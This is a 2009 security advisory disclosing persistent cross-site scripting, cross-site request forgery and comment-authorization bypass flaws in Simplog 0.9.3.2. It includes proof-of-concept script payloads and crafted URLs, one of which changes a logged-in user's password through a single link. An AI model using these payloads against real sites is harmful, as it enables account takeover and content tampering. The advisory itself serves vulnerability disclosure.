################################################################################
	Mutliple Vulnerabilities in Simplog v0.9.3.2

	Name			Multiple vulnerabilities in Simplog
	Systems Affected	Simplog 0.9.3.2 and possibly earlier versions
	Download		http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download
	Author			Amol Naik (amolnaik4[at]gmail.com)
	Date			16/11/2009
################################################################################


############
1. OVERVIEW
############

Simplog provides an easy way for users to add blogging capabilities to their existing websites. 
Simplog is written in PHP and compatible with multiple databases. 
Simplog also features an RSS/Atom aggregator/reader.

###############
2. DESCRIPTION
###############

Simplog is vulnerable to Persistent cross-site scripting, cross-site request forgery and unauthorized comment deletion.

######################
3. TECHNICAL DETAILS
######################

Summery:

	(A) Persistent Cross-site Scripting
	(B) Cross Site Request Forgery
	(C) Edit/Delete Comments (Bypassing Authorization)


(A) Persistent Cross-site Scripting
++++++++++++++++++++++++++++++++++++

Vulnerable page		comments.php
Vulnerable Parameters	cname, email

When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in "Name" & "Email" parameters due to improper sanitization of the user inputs.

++++
POC
++++

Put this in the comment:

Name: <script>alert("AMol_NAik")</script>
email:"><script>alert("AMol_NAik")</script>


(B) Cross Site Request Forgery
+++++++++++++++++++++++++++++++

Vulnerable Page		user.php

This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well.

++++
POC
++++

http://localhost/simplog/user.php?pass1=<new_pass>&pass2=<new_pass>&blogid=<valid_blogid>&act=change


For example, if an authenticated user clicks on the below link, his/her password changes to "AMol_NAik".

http://localhost/simplog/user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change 


(C) Edit/Delete Comments (Bypassing Authorization)
+++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerable Page		comments.php
Vulnerable Parameters	op, cid

The application provides a function to edit n delete the comments to Blog Admin. It is possible for attacker to edit/delete any comment due to improper authorization.

++++
POC
++++

Edit comment:		http://localhost/simplog/comments.php?op=edit&cid=<valid_comment_id>
Delete Comment:		http://localhost/simplog/comments.php?op=del&cid=<valid_comment_id>


############
4. TimeLine
############

03/11/2009		Bug Discovered
03/11/2009		Reported to Vendor
16/11/2009		No response received till the date
16/11/2009		Public Disclosure